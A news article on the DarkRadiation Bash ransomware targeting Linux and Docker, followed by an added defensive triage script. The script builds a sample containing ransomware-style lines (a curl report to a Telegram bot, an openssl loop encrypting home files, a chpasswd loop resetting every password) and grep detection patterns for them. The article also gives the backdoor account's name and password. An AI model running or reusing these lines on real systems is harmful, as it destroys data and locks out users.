The newly discovered DarkRadiation ransomware is unlike most other ransomware families.
Trend Micro cybersecurity researchers have shared their findings on a newly identified ransomware strain dubbed DarkRadiation. The strain is written entirely in Bash, which makes it harder for much security software to recognise it as a threat.
Its primary targets are Linux hosts and Docker containers, which is particularly concerning for enterprises. It also relies on Telegram's bot API to report back to its operators rather than on a conventional C&C channel.
“The ransomware … targets Red Hat/CentOS and Debian Linux distributions. The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s),” researchers noted in their report.
About DarkRadiation Ransomware
The ransomware was first flagged by Twitter user @r3dbU7z on 28 May and later analysed by Trend Micro researchers. It was reportedly found on VirusTotal as part of a collection of hacking tools hosted on the threat actor's infrastructure in a directory named “api_attack.”
There is currently no information on the ransomware's delivery method and no evidence of in-the-wild attacks. An assessment of its individual components, however, shows that it is built to target Linux installations and Docker containers.
DarkRadiation Infection Chain Details
DarkRadiation’s infection chain is a multi-stage process made up of a complex set of Bash scripts and around six C&C servers, all of which were offline when the report was published. The scripts use hard-coded API keys to communicate with Telegram bots and depend on several utilities: curl, wget, OpenSSL, sshpass, and pssh.
If any of these utilities are missing, DarkRadiation installs them with YUM (Yellowdog Updater, Modified), the Python-based package manager used by Red Hat-family distributions such as RHEL and CentOS.
In the final stage, the ransomware enumerates the users on the infected host, overwrites their passwords with a single “mega-password”, creates a new user named “Ferrum” with the password “MegPw0rD3”, and then deletes all existing shell users, according to a separate blog post by SentinelOne researchers.
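The behaviours described above (Telegram bot reporting with a hard-coded token, file encryption via `openssl enc` in AES-CBC mode, sshpass/pssh for remote execution, on-demand `yum install` of those helpers, and bulk password resets or user deletions) are all visible as plain text in a Bash script, so a responder can triage suspect scripts with nothing more than grep. The following is an added example, not DarkRadiation's code and not from the Trend Micro or SentinelOne reports: a small POSIX shell triage function that tags a script with the behaviours it matches. The sample script it scans is constructed here; the bot token, paths and variable names in it are placeholders.

```shell
#!/bin/sh
# Added example: heuristic triage of a shell script for the behaviours the
# article attributes to DarkRadiation. Not the malware's own code.

# Constructed sample input. The token is not a real Telegram bot token and
# $KEY / $PW are never expanded (quoted heredoc); this file is only scanned.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
#!/bin/bash
command -v sshpass >/dev/null || yum install -y sshpass pssh
curl -s "https://api.telegram.org/bot123456789:AAExampleTokenNotReal/sendMessage" -d "chat_id=1&text=started"
for f in /home/*/*.txt; do openssl enc -aes-256-cbc -salt -in "$f" -out "$f.enc" -k "$KEY"; done
for u in $(cut -d: -f1 /etc/passwd); do echo "$u:$PW" | chpasswd; done
EOF

# A second, harmless script: a scan of it should report nothing.
CLEAN=$(mktemp)
cat > "$CLEAN" <<'EOF'
#!/bin/bash
tar czf /tmp/backup.tgz /etc && echo "backup done"
EOF
trap 'rm -f "$SAMPLE" "$CLEAN"' EXIT

# scan_script FILE
# Prints one tag per matched behaviour (sorted, deduplicated). Each grep is a
# hypothetical heuristic chosen for this example; tune the patterns to taste.
scan_script() {
  f=$1
  {
    # Telegram bot API call carrying a hard-coded bot token (bot<id>:<secret>)
    grep -Eq 'api\.telegram\.org/bot[0-9]+:[A-Za-z0-9_-]+' "$f" && echo telegram_bot_token
    # OpenSSL symmetric encryption with an AES-*-CBC cipher
    grep -Eq 'openssl[[:space:]]+enc.*-aes-[0-9]+-cbc' "$f" && echo openssl_aes_cbc
    # sshpass / pssh invoked as commands (password-based remote execution)
    grep -Eq '(^|[[:space:];&|])(sshpass|pssh)([[:space:]]|$)' "$f" && echo remote_exec_helper
    # Installing tooling on the fly through yum
    grep -Eq 'yum[[:space:]]+(-y[[:space:]]+)?install' "$f" && echo yum_install
    # Non-interactive password changes for many accounts
    grep -Eq 'chpasswd|passwd[[:space:]]+--stdin' "$f" && echo bulk_password_reset
    # Account deletion
    grep -Eq '(^|[[:space:];&|])userdel([[:space:]]|$)' "$f" && echo user_deletion
  } | sort -u
}

# Stand-alone usage: print the tags for both constructed files.
echo "sample: $(scan_script "$SAMPLE" | tr '\n' ' ')"
echo "clean:  $(scan_script "$CLEAN" | tr '\n' ' ')"
```

Any one of these tags on its own is weak evidence (sysadmin scripts legitimately call `yum install` or `chpasswd`); it is the combination of a hard-coded bot token, AES-CBC file encryption and mass credential changes in the same script that warrants escalation.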